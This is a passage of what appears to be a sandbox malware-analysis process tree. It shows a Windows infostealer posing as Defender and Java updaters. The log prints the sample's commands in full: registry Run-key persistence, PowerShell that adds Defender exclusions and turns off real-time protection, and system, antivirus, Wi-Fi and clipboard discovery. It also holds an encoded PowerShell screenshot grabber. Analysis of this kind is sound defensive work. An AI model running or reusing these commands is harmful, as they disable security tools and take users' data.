C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f80⤵
- Adds Run key to start application
PID:4324
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"80⤵PID:5292
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"81⤵PID:5152
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"80⤵PID:1236
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"80⤵
- Checks computer location settings
PID:100 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F98E.tmp\F98F.tmp\F990.bat C:\Windows\system32\java.exe"81⤵
- Drops file in System32 directory
PID:1320 -
C:\Windows\system32\timeout.exetimeout 182⤵
- Delays execution with timeout.exe
PID:6116
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f82⤵PID:1988
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f82⤵
- Adds Run key to start application
PID:5212
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f82⤵PID:5592
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f82⤵PID:3244
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"82⤵PID:5648
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"83⤵PID:2192
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"82⤵PID:6136
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"82⤵
- Checks computer location settings
PID:2648 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\14E.tmp\14F.tmp\150.bat C:\Windows\system32\java.exe"83⤵PID:5888
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV184⤵PID:4556
-
-
C:\Windows\system32\timeout.exetimeout 184⤵PID:2216
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f84⤵PID:5880
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f84⤵
- Adds Run key to start application
PID:5868
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f84⤵PID:5640
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f84⤵PID:6044
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"84⤵PID:5840
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"85⤵PID:2564
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"84⤵PID:2208
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"84⤵
- Checks computer location settings
PID:840 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\93D.tmp\93E.tmp\93F.bat C:\Windows\system32\java.exe"85⤵
- Drops file in System32 directory
PID:4500 -
C:\Windows\system32\timeout.exetimeout 186⤵PID:436
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f86⤵PID:2688
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f86⤵PID:2728
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f86⤵PID:1312
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f86⤵PID:4356
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"86⤵PID:5472
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"87⤵PID:1980
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"86⤵PID:1276
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"86⤵
- Checks computer location settings
PID:5716 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\112D.tmp\112E.tmp\112F.bat C:\Windows\system32\java.exe"87⤵
- Drops file in System32 directory
PID:4876 -
C:\Windows\system32\timeout.exetimeout 188⤵PID:1516
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f88⤵
- Adds Run key to start application
PID:2336
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f88⤵
- Adds Run key to start application
PID:3988
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f88⤵PID:2260
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f88⤵PID:6128
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"88⤵PID:516
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"89⤵PID:2724
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"88⤵PID:4416
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"88⤵
- Checks computer location settings
PID:4408 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\18ED.tmp\18EE.tmp\18EF.bat C:\Windows\system32\java.exe"89⤵
- Drops file in System32 directory
PID:1860 -
C:\Windows\system32\timeout.exetimeout 190⤵
- Delays execution with timeout.exe
PID:5336
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f90⤵
- Adds Run key to start application
PID:732
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f90⤵
- Adds Run key to start application
PID:4964
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f90⤵PID:1368
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f90⤵PID:5916
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"90⤵PID:5684
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"91⤵PID:4616
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"90⤵PID:3396
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"90⤵
- Checks computer location settings
PID:4364 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\20CD.tmp\20CE.tmp\20CF.bat C:\Windows\system32\java.exe"91⤵
- Drops file in System32 directory
PID:3924 -
C:\Windows\system32\timeout.exetimeout 192⤵PID:3056
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f92⤵PID:5676
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f92⤵
- Adds Run key to start application
PID:6056
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f92⤵PID:6068
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f92⤵
- Adds Run key to start application
PID:4252
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"92⤵PID:5060
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"93⤵PID:5652
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"92⤵PID:3544
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"92⤵
- Checks computer location settings
PID:3664 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\287D.tmp\287E.tmp\288F.bat C:\Windows\system32\java.exe"93⤵
- Drops file in System32 directory
PID:1540 -
C:\Windows\system32\timeout.exetimeout 194⤵
- Delays execution with timeout.exe
PID:4204
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f94⤵PID:5936
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f94⤵PID:5240
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f94⤵
- Adds Run key to start application
PID:3360
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f94⤵PID:5964
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"94⤵PID:5608
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"95⤵PID:4756
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"94⤵PID:5796
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"94⤵
- Checks computer location settings
PID:6100 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\300F.tmp\3010.tmp\3011.bat C:\Windows\system32\java.exe"95⤵
- Drops file in System32 directory
PID:5188 -
C:\Windows\system32\timeout.exetimeout 196⤵PID:4884
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f96⤵PID:5348
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f96⤵PID:5464
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f96⤵PID:2192
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f96⤵PID:212
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"96⤵PID:4236
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"97⤵PID:5784
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"96⤵PID:5556
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"96⤵
- Checks computer location settings
PID:5816 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\382D.tmp\382E.tmp\382F.bat C:\Windows\system32\java.exe"97⤵
- Drops file in System32 directory
PID:5412 -
C:\Windows\system32\timeout.exetimeout 198⤵PID:5780
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f98⤵
- Adds Run key to start application
PID:468
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f98⤵
- Adds Run key to start application
PID:3504
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f98⤵
- Adds Run key to start application
PID:3744
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f98⤵
- Adds Run key to start application
PID:4540
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"98⤵PID:4088
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"99⤵
- Drops file in Drivers directory
PID:4480 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"100⤵PID:4260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'101⤵
- Command and Scripting Interpreter: PowerShell
PID:2492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"100⤵PID:3952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend101⤵
- Command and Scripting Interpreter: PowerShell
PID:2336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""100⤵PID:684
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"101⤵PID:5872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"100⤵PID:2436
-
C:\Windows\system32\tasklist.exetasklist /FO LIST101⤵
- Enumerates processes with tasklist
PID:1588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"100⤵PID:2300
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid101⤵PID:5176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"100⤵PID:5476
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2101⤵PID:4464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"100⤵PID:2724
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2101⤵PID:5272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"100⤵PID:5888
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name101⤵
- Detects videocard installed
PID:5428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"100⤵PID:4616
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name101⤵
- Detects videocard installed
PID:2072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"100⤵PID:1092
-
C:\Windows\system32\tasklist.exetasklist /FO LIST101⤵
- Enumerates processes with tasklist
PID:3544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"100⤵PID:3852
-
C:\Windows\system32\tasklist.exetasklist /FO LIST101⤵
- Enumerates processes with tasklist
PID:5468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"100⤵PID:4848
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName101⤵PID:4708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"100⤵
- Clipboard Data
PID:5080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard101⤵
- Clipboard Data
PID:2300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"100⤵PID:3868
-
C:\Windows\system32\tasklist.exetasklist /FO LIST101⤵
- Enumerates processes with tasklist
PID:1536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"100⤵PID:4124
-
C:\Windows\system32\tree.comtree /A /F101⤵PID:4420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"100⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4952 -
C:\Windows\system32\netsh.exenetsh wlan show profile101⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"100⤵PID:4620
-
C:\Windows\system32\systeminfo.exesysteminfo101⤵
- Gathers system information
PID:3736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"100⤵PID:5632
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath101⤵PID:5132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="100⤵PID:4476
-
